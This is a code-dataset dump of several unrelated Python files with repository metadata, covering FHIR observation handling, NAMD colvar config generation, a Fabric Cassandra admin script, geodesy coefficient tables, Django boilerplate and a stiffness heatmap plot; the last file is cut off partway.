blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
308191439bd0dc074805fd6cd7cb7ede780d59da
|
2a67feee9e9b2bbb42c22db1c238641035865f31
|
/fhir_patient_summary/createObservationDictionary.py
|
963c21e034cb567815ed76839c5e46e804977ea0
|
[
"MIT"
] |
permissive
|
nicford/FHIR-Patient-Summary
|
7635e8895fc53d4b2ba0e90c1d300d602a9c08aa
|
facda81a739d0981cdd8cc5637c7bd43b632f4bb
|
refs/heads/master
| 2021-04-08T16:15:38.159803
| 2020-03-20T21:27:39
| 2020-03-20T21:27:39
| 248,789,057
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
from fhir_parser import FHIR, observation
class observationDetails:
def __init__(self, component, date):
self.component = component
self.date = date
def getObservationDate(observationDetails: observationDetails):
return observationDetails.date
def createObservationDictionary(observations):
observationDictionary = {}
for observation in observations:
observationDate = observation.effective_datetime
for component in observation.components:
componentCode = component.code
if componentCode == "85354-9" or componentCode == "72166-2": # skip blood pressure readings as they contain no useful information. Blood pressure is split into two readings: Diastolic and Systolic Blood Pressure, also skip tobacco readings since they are also meaningless
continue
if componentCode == "72514-3":
component.unit = ""
if component.code not in observationDictionary:
observationDictionary[component.code] = []
observationDictionary[component.code].append(observationDetails(component, observationDate))
# sort dictionary lists
for key in observationDictionary:
currentList = observationDictionary[key]
currentList.sort(key=getObservationDate)
return observationDictionary
|
[
"univnf@gmail.com"
] |
univnf@gmail.com
|
21eb60d5344f9299bf8910604589c761cd554762
|
765e850116564d47d7ac3afa38ac2c56ccd1ce29
|
/ScMiles/colvar.py
|
d59d7f76fc9195c65c32c9fbca1a00fb2072fb25
|
[] |
no_license
|
UTmilestoning/ScMiles2.0
|
87c7ff9f874aa81392e551c885872be1d1818c48
|
edd23d864834a0e773207b80367a1b68f31cc2c0
|
refs/heads/master
| 2023-06-14T11:41:52.204370
| 2020-09-21T15:45:27
| 2020-09-21T15:45:27
| 315,404,147
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,068
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 09:58:01 2020
@author: allis
"""
# -*- coding: utf-8 -*-
'''
This code generates the colvar configuration file that required by NAMD.
Two constraints will be considered:
1. RMSD(x, anchor_a) = RMSD(x, anchor_b).
2. RMSD(x, any_anchors_besides_a_or_b) > RMSD(x, anchor_a) &&
RMSD(x, any_anchors_besides_a_or_b) > RMSD(x, anchor_b).
Note:
RMSD(x, anchor_a): the root mean square displacement from anchor_a to x
'''
class colvar:
def __init__(self, parameter, anchor1=None, anchor2=None,
free=None, initial=None,
config_path=None, variables=None):
self.parameter = parameter
self.anchor1 = anchor1
self.anchor2 = anchor2
self.variables = []
self.free = free
self.colvars_number = len(self.parameter.anchors[0])
for i in range(1, self.colvars_number + 1):
self.variables.append("")
self.initial = initial
self.config_path = self.parameter.ScMilesPath + "/colvar_free.conf" if self.free == 'yes' else self.parameter.ScMilesPath + "/colvar.conf"
def __exit__(self, exc_type, exc_value, traceback):
return
def __repr__(self) -> str:
return ('Colvar generator')
# def __collective_vari_1(self, name=None, coeff=None, space=0):
# '''
# Change this function for different 1D case.
# Follow the format in Colvars to define a collective variable.
# For the commands below, it generates the following.
#
# dihedral {
# name psi
# group1 atomNumbers 7
# group2 atomNumbers 9
# group3 atomNumbers 15
# group4 atomNumbers 17
# }
#
# '''
# fconf = open(self.config_path, 'a')
# print(" " * space + " dihedral {", file=fconf)
# if name:
# print(" " * space + " name {}".format(name), file=fconf)
# if coeff:
# print(" " * space + " componentCoeff {}".format(coeff), file=fconf)
# print(" " * space + " group1 atomNumbers 7", file=fconf)
# print(" " * space + " group2 atomNumbers 9", file=fconf)
# print(" " * space + " group3 atomNumbers 15", file=fconf)
# print(" " * space + " group4 atomNumbers 17", file=fconf)
# print(" " * space + " }", file=fconf)
# fconf.close()
def __get_colvar_names(self):
'''Stores colvar names in array "variables"'''
count = 0
section = 1
with open(file=self.parameter.inputPath + '/colvar.txt') as f:
for line in f:
if '{' in line:
count += 1
if '}' in line:
count -= 1
if count == 0:
section += 1
if "name" in line:
info = line.split("#")[0].split()
if len(info) >= 2 and info[0] == "name":
self.variables[section-1] = str(info[1])
if self.colvars_number == section:
break
def __collective_vari(self, name=None, coeff=None, space=0):
'''Saves all text from colvar.txt for each name (so not rmsd)'''
tmp = []
count = 0
section = 1
with open(file=self.parameter.inputPath+'/colvar.txt') as f:
for line in f:
if '{' in line:
count += 1
if '}' in line:
count -= 1
if count == 0:
section += 1
if section > self.colvars_number:
tmp.append(line + '\n')
break
tmp.append(line + '\n')
fconf = open(self.config_path, 'a')
for line in tmp:
print(" " * space + " " + line, file=fconf)
fconf.close()
for i in range(1,self.colvars_number + 1):
if self.variables[i-1] == '':
log("Colvar Error. Please name your colvars")
def __rmsd_to_anchor(self, anchor, coeff=None, space=0):
'''Used in "free" case, replaces "anchor" with the corresponding number in anchors.txt'''
# scriptPath = os.path.dirname(os.path.abspath(__file__))
# inputdir = os.path.abspath(os.path.join(scriptPath, os.pardir)) + '/my_project_input'
tmp = []
count = 0
first = True
section = 1
name_get = False
with open(file=self.parameter.inputPath+'/colvar.txt') as f:
for line in f:
if '{' in line:
first = False
count += 1
if '}' in line:
count -= 1
if count == 0 and first == False:
if section == self.colvars_number + 1:
tmp.append(line + '\n')
section += 1
continue
if section == self.colvars_number + 1:
if 'name' in line and name_get == False:
line = " name rmsd" + str(anchor)
name_get = True
# if 'anchor' in line:
# line = line.replace("anchor", '('+str(self.parameter.anchors[anchor-1][0])+')')
if 'anchor' in line:
for i in range(0, self.colvars_number):
line = line.replace("anchor", '('+str(self.parameter.anchors[anchor-1][i])+')', 1)
tmp.append(line + '\n')
fconf = open(self.config_path, 'a')
for line in tmp:
print(" " * space + " " + line, file=fconf)
fconf.close()
# def __rmsd_to_anchor(self, anchor, coeff=None, space=0):
# '''
# Change this function for different 1D case.
# Follow the format in Colvars to define the distance measurement.
# For the commands below, it generates the following.
#
# colvar {
# name rmsd1
# customFunction abs(psi - (-165.0))
# dihedral {
# name psi
# group1 atomNumbers 7
# group2 atomNumbers 9
# group3 atomNumbers 15
# group4 atomNumbers 17
# }
# }
#
# '''
# fconf = open(self.config_path, 'a')
# name = "rmsd" + str(anchor)
# print("\n" + " " * space + "colvar {", file=fconf)
# print(" " * space + " name {:5}".format(name), file=fconf)
# func = "abs(psi - (" + str(self.parameter.anchors[anchor-1][0]) + "))"
# print(" " * space + " customFunction {}".format(func), file=fconf)
# fconf.close()
# self.__collective_vari_1()
# fconf = open(self.config_path, 'a')
# print(" " * space + "}", file=fconf)
# fconf.close()
def generate(self):
'''This is the main function that generates colvars '''
# scriptPath = os.path.dirname(os.path.abspath(__file__))
if self.initial == 'yes':
outputFrequency = 1
else:
outputFrequency = self.parameter.colvarsTrajFrequency
fconf = open(self.config_path, 'w+')
print("colvarsTrajFrequency {}".format(outputFrequency), file=fconf)
print("colvarsRestartFrequency {}".format(self.parameter.colvarsRestartFrequency), file=fconf)
if self.free == 'yes':
print("scriptedColvarForces on", file=fconf)
if self.parameter.customColvars == True:
print("", file=fconf)
with open(file=self.parameter.inputPath + '/custom.colvar') as f_custom:
for line in f_custom:
print(line, file=fconf)
fconf.close()
if self.free == 'yes':
for i in range(self.parameter.AnchorNum):
self.__rmsd_to_anchor(i+1)
else:
self.__get_colvar_names()
if self.colvars_number == 1:
self.__constraint1D1()
self.__harmonic1D()
else:
self.__constraint2D1()
colvarList, centers = self.__constraint2D2()
self.__harmonic2D()
self.__harmonicWalls(colvarList, centers)
def __constraint1D1(self):
fconf = open(self.config_path, 'a')
print("\ncolvar {", file=fconf)
print(" name colv", file=fconf)
fconf.close()
self.__collective_vari()
fconf = open(self.config_path, 'a')
print("}\n\n", file=fconf)
fconf.close()
def __harmonic1D(self):
fconf = open(self.config_path, 'a')
print("\nharmonic {", file=fconf)
print(" colvars colv", file=fconf)
center = (self.parameter.anchors[self.anchor1-1][0] + self.parameter.anchors[self.anchor2-1][0]) / 2
if self.parameter.pbc != [] and abs(self.anchor1 - self.anchor2) > 1:
center = 180
print(" centers {}".format(center), file=fconf)
print(" forceConstant {}".format(self.parameter.forceConst), file=fconf)
print("}", file=fconf)
fconf.close()
def __constraint2D1(self):
fconf = open(self.config_path, 'a')
print("\ncolvar {", file=fconf)
print(" name neighbor", file=fconf)
customFunc = self.__custom_function(self.anchor1-1, self.anchor2-1)
print(customFunc, file=fconf)
fconf.close()
self.__collective_vari(space=1)
fconf = open(self.config_path, 'a')
print("}\n\n", file=fconf)
fconf.close()
def __custom_function(self, anchor1, anchor2):
'''Creates the customFunction for cases with more than one colvar'''
customFunc = " customFunction "
for section in (1,2):
if section == 1:
anchor = anchor1
else:
anchor = anchor2
customFunc = customFunc + 'sqrt('
for i in range(1, self.colvars_number + 1):
customFunc = customFunc + '(' + self.variables[i-1] + '-(' + \
str(self.parameter.anchors[anchor][i-1]) + '))^2'
if i != self.colvars_number:
customFunc = customFunc + ' + '
if section == 1:
customFunc = customFunc + ') - '
else:
customFunc = customFunc + ')'
return customFunc
def __constraint2D2(self):
colvarList = ""
centers = ""
for i in range(self.parameter.AnchorNum):
if i + 1 != self.anchor1 and i + 1 != self.anchor2:
fconf = open(self.config_path, 'a')
print("colvar {", file=fconf)
print(" name {}_{}".format(i + 1, self.anchor1), file=fconf)
customFunc = self.__custom_function(i, self.anchor1-1)
print(customFunc, file=fconf)
colvarList += str(i + 1) + "_" + str(self.anchor1) + " "
centers += "0 "
fconf.close()
self.__collective_vari(space=2)
fconf = open(self.config_path, 'a')
print("}\n", file=fconf)
print("colvar {", file=fconf)
print(" name {}_{}".format(i + 1, self.anchor2), file=fconf)
customFunc = self.__custom_function(i,self.anchor2-1)
print(customFunc, file=fconf)
colvarList += str(i + 1) + "_" + str(self.anchor2) + " "
centers += "0 "
fconf.close()
self.__collective_vari(space=2)
fconf = open(self.config_path, 'a')
print("}\n", file=fconf)
fconf.close()
return colvarList, centers
def __harmonic2D(self):
fconf = open(self.config_path, 'a')
print("harmonic {", file=fconf)
print(" colvars neighbor", file=fconf)
center = 0
print(" centers {}".format(str(center)), file=fconf)
print(" forceConstant {}".format(self.parameter.forceConst), file=fconf)
print("}", file=fconf)
fconf.close()
def __harmonicWalls(self, colvarList, centers):
fconf = open(self.config_path, 'a')
print("\n", file=fconf)
print("harmonicWalls {", file=fconf)
print(" colvars {}".format(colvarList), file=fconf)
print(" lowerWalls {}".format(centers), file=fconf)
print(" lowerWallConstant {}".format(self.parameter.forceConst), file=fconf)
print("}", file=fconf)
fconf.close()
if __name__ == '__main__':
from parameters import *
new = parameters()
new.initialize()
print(new.anchors)
colvar(new, anchor1=1, anchor2=2).generate()
colvar(new, anchor1=1, anchor2=2, free='yes').generate()
|
[
"noreply@github.com"
] |
UTmilestoning.noreply@github.com
|
f252de4cff61581fdaf7d56a81128d97eeb01fb5
|
8ca2516c71e5e23b393c9b635f09b8c379468844
|
/Terraform/cassandra/scripts/cas.py
|
e83a081190f06b027ad7507805506e6189c6432b
|
[] |
no_license
|
richnusgeeks/devops
|
de8823f493e48f2216406b067474d67c851d46e4
|
e0abaf170ba66ce83542140bfc243b4a509ceafd
|
refs/heads/master
| 2023-02-27T19:33:59.261885
| 2023-02-09T11:43:39
| 2023-02-09T11:43:39
| 27,112,863
| 11
| 12
| null | 2022-09-30T20:23:06
| 2014-11-25T06:45:47
|
Shell
|
UTF-8
|
Python
| false
| false
| 778
|
py
|
from time import sleep
from fabric.api import env, sudo, run, get, put, local
from fabric.decorators import hosts, roles, parallel
env.user = "ubuntu"
env.key_filename = "<Private Key>"
env.warn_only = True
env.skip_bad_hosts = True
env.connection_attempts = 3
env.abort_on_prompts = True
def postCAS(dump=False):
if not dump:
sudo("service dse start")
# run("while true; do if ! nc -vz ${self.private_ip} 9042 9160 2>/dev/null; then sleep 5; else break; fi; done")
run("sleep 20")
run("nodetool status; nodetool info; nodetool tpstats; echo")
sudo("netstat -nlptu | grep -E '(9042|9160)'")
def rmveCASNds():
run("for u in $(nodetool status|grep DN|awk '{print $7}'); do nodetool removenode $u; nodetool removenode force; done")
|
[
"ankur.kumar@reltio.com"
] |
ankur.kumar@reltio.com
|
00131fab13b704870de4a2453e7aa99e38d101fc
|
e3cfab409afb5ff9a0b3812bf848be6ca9239cee
|
/pygeodesy/auxilats/_CX_4.py
|
8f0be523af660c0f819c189cb7568d29290f9271
|
[
"MIT"
] |
permissive
|
mrJean1/PyGeodesy
|
565266a4f7f6cda5abe98e915bbd868f6cbe1760
|
eba35704b248a7a0388b30f3cea19793921e99b7
|
refs/heads/master
| 2023-08-23T13:58:20.069917
| 2023-08-20T18:50:45
| 2023-08-20T18:50:45
| 68,028,481
| 283
| 66
| null | 2022-04-09T00:40:52
| 2016-09-12T16:49:10
|
Python
|
UTF-8
|
Python
| false
| false
| 8,662
|
py
|
# -*- coding: utf-8 -*-
u'''Coeficients for C{_AUXLATITUDE_ORDER} 4 from I{Karney}'s C++ class U{AuxLatitude
<https://GeographicLib.SourceForge.io/C++/doc/classGeographicLib_1_1AuxLatitude.html>}
trancoded to a double, uniquified Python C{dict[auxout][auxin]}.
Copyright (C) Charles Karney (2022-2023) Karney@Alum.MIT.edu> and licensed under the
MIT/X11 License. For more information, see <https:#GeographicLib.SourceForge.io>.
'''
# make sure int/int division yields float quotient
from __future__ import division as _; del _ # PYCHOK semicolon
from pygeodesy.auxilats.auxily import Aux, _Ufloats
from pygeodesy.constants import _0_0, _0_25, _0_5, _1_0, _N_1_0, \
_1_5, _2_0, _N_2_0, _4_0
__all__ = ()
__version__ = '23.08.19'
_f, _u = float, _Ufloats()
_coeffs_4 = _u._Coeffs(4, { # GEOGRAPHICLIB_AUXLATITUDE_ORDER == 4
Aux.PHI: {
# C[phi,phi] skipped
Aux.BETA: _u( # C[phi,beta]; even coeffs only
_0_0, _1_0,
_0_0, _0_5,
1 / _f(3),
_0_25,),
Aux.THETA: _u( # C[phi,theta]; even coeffs only
_N_2_0, _2_0,
-_4_0, _2_0,
8 / _f(3),
_4_0,),
Aux.MU: _u( # C[phi,mu]; even coeffs only
-27 / _f(32), _1_5,
-55 / _f(32), 21 / _f(16),
151 / _f(96),
1097 / _f(512),),
Aux.CHI: _u( # C[phi,chi]
116 / _f(45), _N_2_0, -2 / _f(3), _2_0,
-227 / _f(45), -8 / _f(5), 7 / _f(3),
-136 / _f(35), 56 / _f(15),
4279 / _f(630),),
Aux.XI: _u( # C[phi,xi]
-2582 / _f(14175), -16 / _f(35), 4 / _f(45), 4 / _f(3),
-11966 / _f(14175), 152 / _f(945), 46 / _f(45),
3802 / _f(14175), 3044 / _f(2835),
6059 / _f(4725),)
},
Aux.BETA: {
Aux.PHI: _u( # C[beta,phi]; even coeffs only
_0_0, _N_1_0,
_0_0, _0_5,
-1 / _f(3),
_0_25,),
# C[beta,beta] skipped
Aux.THETA: _u( # C[beta,theta]; even coeffs only
_0_0, _1_0,
_0_0, _0_5,
1 / _f(3),
_0_25,),
Aux.MU: _u( # C[beta,mu]; even coeffs only
-9 / _f(32), _0_5,
-37 / _f(96), 5 / _f(16),
29 / _f(96),
539 / _f(1536),),
Aux.CHI: _u( # C[beta,chi]
38 / _f(45), -1 / _f(3), -2 / _f(3), _1_0,
-7 / _f(9), -14 / _f(15), 5 / _f(6),
-34 / _f(21), 16 / _f(15),
2069 / _f(1260),),
Aux.XI: _u( # C[beta,xi]
-1082 / _f(14175), -46 / _f(315), 4 / _f(45), 1 / _f(3),
-338 / _f(2025), 68 / _f(945), 17 / _f(90),
1102 / _f(14175), 461 / _f(2835),
3161 / _f(18900),)
},
Aux.THETA: {
Aux.PHI: _u( # C[theta,phi]; even coeffs only
_2_0, _N_2_0,
-_4_0, _2_0,
-8 / _f(3),
_4_0,),
Aux.BETA: _u( # C[theta,beta]; even coeffs only
_0_0, _N_1_0,
_0_0, _0_5,
-1 / _f(3),
_0_25,),
# C[theta,theta] skipped
Aux.MU: _u( # C[theta,mu]; even coeffs only
-23 / _f(32), -1 / _f(2),
-5 / _f(96), 5 / _f(16),
1 / _f(32),
283 / _f(1536),),
Aux.CHI: _u( # C[theta,chi]
4 / _f(9), -2 / _f(3), -2 / _f(3), _0_0,
-23 / _f(45), -4 / _f(15), 1 / _f(3),
-24 / _f(35), 2 / _f(5),
83 / _f(126),),
Aux.XI: _u( # C[thet),a,xi]
-2102 / _f(14175), -158 / _f(315), 4 / _f(45), -2 / _f(3),
934 / _f(14175), -16 / _f(945), 16 / _f(45),
922 / _f(14175), -232 / _f(2835),
719 / _f(4725),)
},
Aux.MU: {
Aux.PHI: _u( # C[mu,phi]; even coeffs only
9 / _f(16), -3 / _f(2),
-15 / _f(32), 15 / _f(16),
-35 / _f(48),
315 / _f(512),),
Aux.BETA: _u( # C[mu,beta]; even coeffs only
3 / _f(16), -1 / _f(2),
1 / _f(32), -1 / _f(16),
-1 / _f(48),
-5 / _f(512),),
Aux.THETA: _u( # C[mu,theta]; even coeffs only
13 / _f(16), _0_5,
33 / _f(32), -1 / _f(16),
-5 / _f(16),
-261 / _f(512),),
# C[mu,mu] skipped
Aux.CHI: _u( # C[mu,chi]
41 / _f(180), 5 / _f(16), -2 / _f(3), _0_5,
557 / _f(1440), -3 / _f(5), 13 / _f(48),
-103 / _f(140), 61 / _f(240),
49561 / _f(161280),),
Aux.XI: _u( # C[mu,xi]
-1609 / _f(28350), 121 / _f(1680), 4 / _f(45), -1 / _f(6),
16463 / _f(453600), 26 / _f(945), -29 / _f(720),
449 / _f(28350), -1003 / _f(45360),
-40457 / _f(2419200),)
},
Aux.CHI: {
Aux.PHI: _u( # C[chi,phi]
-82 / _f(45), 4 / _f(3), 2 / _f(3), _N_2_0,
-13 / _f(9), -16 / _f(15), 5 / _f(3),
34 / _f(21), -26 / _f(15),
1237 / _f(630),),
Aux.BETA: _u( # C[chi,beta]
-16 / _f(45), _0_0, 2 / _f(3), _N_1_0,
19 / _f(45), -2 / _f(5), 1 / _f(6),
16 / _f(105), -1 / _f(15),
17 / _f(1260),),
Aux.THETA: _u( # C[chi,theta]
-2 / _f(9), 2 / _f(3), 2 / _f(3), _0_0,
43 / _f(45), 4 / _f(15), -1 / _f(3),
2 / _f(105), -2 / _f(5),
-55 / _f(126),),
Aux.MU: _u( # C[chi,mu]
1 / _f(360), -37 / _f(96), 2 / _f(3), -1 / _f(2),
437 / _f(1440), -1 / _f(15), -1 / _f(48),
37 / _f(840), -17 / _f(480),
-4397 / _f(161280),),
# C[chi,chi] skipped
Aux.XI: _u( # C[chi,xi]
-2312 / _f(14175), -88 / _f(315), 34 / _f(45), -2 / _f(3),
6079 / _f(14175), -184 / _f(945), 1 / _f(45),
772 / _f(14175), -106 / _f(2835),
-167 / _f(9450),)
},
Aux.XI: {
Aux.PHI: _u( # C[xi,phi]
538 / _f(4725), 88 / _f(315), -4 / _f(45), -4 / _f(3),
-2482 / _f(14175), 8 / _f(105), 34 / _f(45),
-898 / _f(14175), -1532 / _f(2835),
6007 / _f(14175),),
Aux.BETA: _u( # C[xi,beta]
34 / _f(675), 32 / _f(315), -4 / _f(45), -1 / _f(3),
74 / _f(2025), -4 / _f(315), -7 / _f(90),
2 / _f(14175), -83 / _f(2835),
-797 / _f(56700),),
Aux.THETA: _u( # C[xi,theta]
778 / _f(4725), 62 / _f(105), -4 / _f(45), 2 / _f(3),
12338 / _f(14175), -32 / _f(315), 4 / _f(45),
-1618 / _f(14175), -524 / _f(2835),
-5933 / _f(14175),),
Aux.MU: _u( # C[xi,mu]
1297 / _f(18900), -817 / _f(10080), -4 / _f(45), 1 / _f(6),
-29609 / _f(453600), -2 / _f(35), 49 / _f(720),
-2917 / _f(56700), 4463 / _f(90720),
331799 / _f(7257600),),
Aux.CHI: _u( # C[xi,chi]
2458 / _f(4725), 46 / _f(315), -34 / _f(45), 2 / _f(3),
3413 / _f(14175), -256 / _f(315), 19 / _f(45),
-15958 / _f(14175), 248 / _f(567),
16049 / _f(28350),) # PYCHOK exported
# C[xi,xi] skipped
}
})
# _ptrs_4 = (0, 0, 6, 12, 18, 28, 38, 44, 44, 50, 56, 66,
# 76, 82, 88, 88, 94, 104, 114, 120, 126, 132, 132, 142,
# 152, 162, 172, 182, 192, 192, 202, 212, 222, 232, 242, 252,
# 252) # PYCHOK exported
del _f, _u
# **) MIT License
#
# Copyright (C) 2023-2023 -- mrJean1 at Gmail -- All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
|
[
"mrJean1@Gmail.com"
] |
mrJean1@Gmail.com
|
ca72dad07785635db839762f87edc38573cf4b74
|
011db9359d76d875acf1e56334b1cbe4439b80c0
|
/restTest/wsgi.py
|
acdb195242da74ac01dfc94667bd37805e5a0c5f
|
[] |
no_license
|
buckyron/djangorest
|
3aed87319ee6a808724fdd8259c93463edb7ea3b
|
ce61b23ffc83a8fddfbdbfca1e41ccbac17198d3
|
refs/heads/master
| 2022-12-29T22:49:22.395069
| 2020-10-19T06:51:01
| 2020-10-19T06:51:01
| 305,288,768
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
WSGI config for restTest project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'restTest.settings')
application = get_wsgi_application()
|
[
"harivicky2020@gmail.com"
] |
harivicky2020@gmail.com
|
8114b030b00d54522fb2caa1fbfcae53b2daf2fe
|
1fdc5597e06055662aa31ba425d5d7449721efe8
|
/Alphabet_2/CODE/sub_alphabet.py
|
8e0c314cedd91965ff67394efc6bb10857866c78
|
[] |
no_license
|
VibhutiNandel/GitHub_test
|
2ebb0c3b9bdf3c5509744c294c306e4cb63cd380
|
f184e7e925c7f485c6e1f4530310f1cd2900ba74
|
refs/heads/master
| 2020-04-17T05:54:35.634357
| 2019-01-17T22:03:30
| 2019-01-17T22:03:30
| 166,238,552
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
#! /usr/bin/env python
for x in range(65,90):
with open("RESULTS/initial_test.txt", "ab") as Infile:
Infile.write(chr(x) + "\n")
|
[
"v.nandel@student.rug.nl"
] |
v.nandel@student.rug.nl
|
da50f84db280709c8bf00d786a3c4d94770be37c
|
15018a1c9784c9abaabea2e65d802d4a339b74e5
|
/hairpin/admin.py
|
8eaf8a6d318654126ecf2ef7f973427b9b7d38ef
|
[
"MIT"
] |
permissive
|
Gaidy/lin_hairpin
|
b9edaa0d547f1981489ffd8e73384df1c13a3828
|
1267e880d4b88d841019a904009bbf5828c1db09
|
refs/heads/master
| 2022-10-02T20:08:38.571702
| 2020-03-13T04:12:49
| 2020-03-13T04:12:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
from django.contrib import admin
from hairpin.models import Category, Product, Cami, Order, PayRecord, CAMI_TYPE_MAP
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
"""
分类管理
"""
list_display = ['id', 'title', 'desc']
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
"""
产品管理
"""
list_display = ['id', 'category_name', 'title', 'cami_type_name', 'price', 'desc', 'status']
def category_name(self, obj):
return obj.category.title
def cami_type_name(self, obj):
return CAMI_TYPE_MAP[obj.cami_type]
cami_type_name.short_description = '卡密类型'
category_name.short_description = '产品分类'
@admin.register(Cami)
class CamiAdmin(admin.ModelAdmin):
"""
卡密管理
"""
pass
@admin.register(PayRecord)
class PayRecordAdmin(admin.ModelAdmin):
"""
支付记录管理
"""
pass
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
"""
订单管理
"""
pass
|
[
"406728295@qq.com"
] |
406728295@qq.com
|
d381bf0d3308017cf95d705aab828040beeeab2d
|
aebe19a393e9dcba5c4799cf73cd2912a40abc9e
|
/setup.py
|
64b0059e88dc09a2cadfcadedafbffb2b602da13
|
[] |
no_license
|
jdque/raycast
|
0aed0c996422da31eea2a892723b278175ac6ef2
|
e22a5c6d342cafa0219e98d04cee74e38403260f
|
refs/heads/master
| 2021-01-12T15:15:50.421437
| 2017-02-21T02:17:05
| 2017-02-21T02:17:05
| 71,736,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 338
|
py
|
from setuptools import setup
# from Cython.Build import cythonize
# import numpy
# setup(
# name = "Hello",
# ext_modules = cythonize('geometry_c.pyx'),
# include_dirs=[numpy.get_include()]
# )
setup(
name = "raycast",
version = "0.1",
install_requires = [
'numpy',
'pysdl2',
'pyopengl'
]
)
|
[
"jaqms90@gmail.com"
] |
jaqms90@gmail.com
|
a94ce7a44499ba970ed1db8268d174d859b0f802
|
f4448831c8594cc16eb6f5e123a6f6157d7d9f4e
|
/conven_control/scripts/stiffness_heatmap.py
|
6d52294f7ddbbbd7ddfb16a3a28cd8bbe42edea1
|
[] |
no_license
|
benthebear93/null-space-posture-optimization
|
64ed58ffed6ac5be216bdd1f369dde66adda890f
|
9bf6226d301c1b63f18c0ac877c792b8393f6f71
|
refs/heads/main
| 2023-09-05T07:02:03.852252
| 2021-11-24T15:14:26
| 2021-11-24T15:14:26
| 399,497,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,769
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
def heatmap_read(filename, axisname):
# load_wb = load_workbook("C:/Users/UNIST/Desktop/stiffness_estimation/test_z.xlsx", data_only=True)
df = pd.read_excel(filename, header=None, names=None, index_col=None)
num_test = df.shape[0]
print(df)
xtick = [0.65, 0.8, 0.95]
ytick = [-0.35, -0.2, -0.05, 0.1, 0.25]
stiffness = []
overall_stiff = []
opt_stiffness = []
overall_optstiff = []
changed_stiffness_str = []
changed_stiffness = []
overal_change_str =[]
overal_change = []
for j in range(1, len(ytick)*len(xtick)+1):
stiffness.append(round(df[2][j],5))
opt_stiffness.append(round(df[3][j],5))
temp = str(round(100*(df[3][j] - df[2][j])/df[2][j],2))
temp2 = round(100*(df[3][j] - df[2][j])/df[2][j],2)
temp = temp+"%"
changed_stiffness_str.append(temp)
changed_stiffness.append(temp2)
if j%len(ytick)==0:
overall_stiff.append(stiffness)
overall_optstiff.append(opt_stiffness)
overal_change_str.append(changed_stiffness_str)
overal_change.append(changed_stiffness)
stiffness = []
opt_stiffness = []
changed_stiffness_str = []
changed_stiffness = []
fig, ax = plt.subplots()
im = ax.imshow(overall_stiff, vmin=1, vmax=6.5, cmap = 'autumn_r')
cbar = ax.figure.colorbar(im, ax=ax)
cbarlabel = "stiffness"
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize = 12)
# We want to show all ticks...
ax.set_xticks(np.arange(len(ytick)))
ax.set_yticks(np.arange(len(xtick)))
# ... and label them with the respective list entries
ax.set_xticklabels(ytick)
ax.set_yticklabels(xtick)
ax.set_xlabel('y (m)', fontsize = 13)
ax.set_ylabel('x (m)', fontsize = 13)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
for i in range(len(xtick)):
for j in range(len(ytick)):
text = ax.text(j, i, overall_stiff[i][j],
ha="center", va="center", color="black")
ax.set_title("Stiffness of Non-optimized posture(" + axisname+ " axis)", fontsize = 16)
fig.tight_layout()
plt.show()
fig, ax = plt.subplots()
im = ax.imshow(overall_optstiff, vmin=1, vmax=6.5, cmap = 'autumn_r')
cbar = ax.figure.colorbar(im, ax=ax)
cbarlabel = "stiffness"
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize = 12)
# We want to show all ticks...
ax.set_xticks(np.arange(len(ytick)))
ax.set_yticks(np.arange(len(xtick)))
# ... and label them with the respective list entries
